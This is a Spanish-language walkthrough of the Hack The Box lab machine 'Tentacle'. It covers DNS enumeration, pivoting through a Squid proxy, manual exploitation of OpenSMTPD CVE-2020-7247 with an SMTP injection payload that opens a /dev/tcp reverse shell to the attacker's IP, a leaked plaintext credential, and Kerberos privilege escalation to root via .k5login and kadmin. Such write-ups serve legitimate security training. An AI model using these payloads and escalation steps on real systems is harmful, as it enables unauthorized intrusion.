# Tentacle

**OS**: Linux \
**Dificultad**: Difícil \
**Puntos**: 40

## Resumen
- Enum subdominios
- Squid Proxy
- Proxychains
- OpenSMTP CVE-2020-7247
- Kerberos Authentication (krb5)
- k5login
- kadmin impersonate
- ksu

## Nmap Scan

`nmap -p- -sV -sC -oN nmap.txt 10.10.10.224`

```
Nmap scan report for 10.10.10.224
Host is up (0.062s latency).
Not shown: 65530 filtered ports
PORT     STATE  SERVICE      VERSION
22/tcp   open   ssh          OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 8d:dd:18:10:e5:7b:b0:da:a3:fa:14:37:a7:52:7a:9c (RSA)
|   256 f6:a9:2e:57:f8:18:b6:f4:ee:03:41:27:1e:1f:93:99 (ECDSA)
|_  256 04:74:dd:68:79:f4:22:78:d8:ce:dd:8b:3e:8c:76:3b (ED25519)
53/tcp   open   domain       ISC BIND 9.11.20 (RedHat Enterprise Linux 8)
| dns-nsid: 
|_  bind.version: 9.11.20-RedHat-9.11.20-5.el8
88/tcp   open   kerberos-sec MIT Kerberos (server time: 2021-05-04 15:30:34Z)
3128/tcp open   http-proxy   Squid http proxy 4.11
|_http-server-header: squid/4.11
|_http-title: ERROR: The requested URL could not be retrieved
9090/tcp closed zeus-admin
Service Info: Host: REALCORP.HTB; OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:8
```

## Enumeración

En el puerto 3128 encontramos un nombre de dominio y un correo.

![1](img/1.png)

En el escaneo de puertos también esta el puerto 53 utilizando **dig** encontramos una dirección IP.

`dig ANY @10.10.10.224 realcorp.htb`

![2](img/2.png)

Enumerando subdominios obtenemos otra dirección IP.

`dnsenum --dnsserver 10.10.10.224 -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt realcorp.htb`

![3](img/3.png)

Agregamos los subdominios a nuestro archivo hosts.

##### /etc/hosts
```
10.10.10.224    srv01.realcorp.htb realcorp.htb
10.197.243.31   wpad.realcorp.htb
```

### Squid Proxy

Ya que Squid funciona como proxy utilizaremos **proxychains** para acceder a esas IP's. Configuramos el archivo **/etc/proxychains4.conf**.

`nano /etc/proxychains4.conf`

![4](img/4.png)

Escaneando los puertos encontramos que la IP **10.197.243.77** cuenta con otro Squid proxy.

> Si obtienes el siguiente error: \
    nmap: netutil.cc:1319: int collect_dnet_interfaces(const intf_entry*, void*): Assertion `rc == 0' failed. \
    Comenta la siguiente línea en /etc/proxychains4.conf: \
    proxy_dns

`proxychains nmap -sT 10.197.243.77 2>/dev/null`

![5](img/5.png)

Modificamos nuevamente el archivo **proxychains4.conf**.

![6](img/6.png)

Realizando otro escaneo de puertos a la IP **10.197.243.31** vemos un puerto 80 abierto.

`proxychains nmap -sT 10.197.243.31 2>/dev/null`

![7](img/7.png)

Haciendo fuzzing de archivos encontramos **wpad.dat**.

`proxychains wfuzz -c --hc 404,403 -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://wpad.realcorp.htb/FUZZ.dat 2>/dev/null`

![8](img/8.png)

Ese archivo contiene otra dirección IP.

`proxychains curl http://wpad.realcorp.htb/wpad.dat`

![9](img/9.png)

Después de hacer un barrido del segmento encontramos la IP **10.241.251.113** que solo tiene el puerto 25 abierto.

`proxychains nmap -sT -sC -sV 10.241.251.113 2>/dev/null`

![10](img/10.png)

### OpenSMTP CVE-2020-7247

Ya que la versión de openSMTP que está ejecutando es antigua encontramos exploits públicos que nos permiten obtener ejecución de comandos.

Ponemos a la escucha nuestro netcat.

`nc -lvnp 1234`

Replicaremos el ataque de forma manual, para eso nos conectamos al puerto 25 y ejecutamos los siguientes comandos.

`proxychains nc 10.241.251.113 25 2>/dev/null`

```
HELO doom
MAIL FROM:<;for i in 0 1 2 3 4 5;do read i;done;bash;exit 0;>
RCPT TO:<j.nakazawa@realcorp.htb>
DATA

#
#
#
#
#
#
0<&95-;exec 95<>/dev/tcp/10.10.14.33/1234;bash <&95 >&95 2>&95
.
```

![11](img/11.png)

## Escalada de Privilegios (User)

Dentro del directorio **/home/j.nakazawa/** encontramos el archivo **.msmtprc** que contiene credenciales.

`cat /home/j.nakazawa/.msmtprc`

![12](img/12.png)

```
j.nakazawa : sJB}RM>6Z~64_
```

### Kerberos Authentication (krb5)

No es posible acceder directamente por SSH por lo tanto utilizaremos esas credenciales para crear un ticket de kerberos y autenticarnos de esa manera, ya que en el primer escaneo de puertos vemos que tiene abierto el puerto 88.

Necesitamos instalar el siguiente paquete:

`apt install krb5-user`

Modificamos nuestro archivo **/etc/krb5.conf** con lo siguiente:

`code /etc/krb5.conf`

![13](img/13.png)

Posteriormente generamos nuestro ticket con las credenciales anteriores.

- `kinit j.nakazawa`
- `klist`

![14](img/14.png)

Ahora es posible conectarnos por SSH sin ningún problema.

`ssh j.nakazawa@10.10.10.224`

![15](img/15.png)

## Escalada de Privilegios (Root)

Utilizando linpeas encontramos que hay un cronjob que está ejecutando el archivo **log_backup.sh** como el usuario admin.

- `scp /opt/linux/linpeas.sh j.nakazawa@10.10.10.224:/tmp/linpeas.sh`
- `chmod +x /tmp/linpeas.sh`
- `/tmp/linpeas.sh`

![16](img/16.png)

También vemos que podemos escribir en el directorio **/var/log/squid**.

![17](img/17.png)

El archivo **/usr/local/bin/log_backup.sh** lo que está haciendo es copiar el contenido de **/var/log/squid/** en **/home/admin**.

`cat /usr/local/bin/log_backup.sh`

![18](img/18.png)

Para aprovecharnos de esto crearemos un archivo **.k5login** en **/var/log/squid/** para que podamos acceder por SSH con el usuario **admin**:

- `echo 'j.nakazawa@REALCORP.HTB' > /var/log/squid/.k5login`
- `ssh admin@10.10.10.224`

![19](img/19.png)

Utilizando nuevamente linpeas encontramos que es posible impersonar los siguientes tickets:

![20](img/20.png)

Podemos añadir al usuario root para posteriormente conectarnos, nos pedirá un password le podemos dar cualquiera.

- `kadmin -k -t /etc/krb5.keytab -p kadmin/admin@REALCORP.HTB`
- `add_principal root@REALCORP.HTB`
- `doom123`
- `exit`

![21](img/21.png)

Inmediatamente iniciaremos sesión como root.

`ksu root`

![22](img/22.png)

## Referencias
https://www.qualys.com/2020/01/28/cve-2020-7247/lpe-rce-opensmtpd.txt \
https://github.com/superzerosec/cve-2020-7247 \
https://www.exploit-db.com/exploits/47984 \
https://directory.apache.org/apacheds/kerberos-ug/4.1-authenticate-kinit.html \
https://web.mit.edu/kerberos/krb5-1.5/krb5-1.5.4/doc/krb5-user/Obtaining-Tickets-with-kinit.html \
https://web.mit.edu/kerberos/krb5-devel/doc/user/user_config/k5login.html

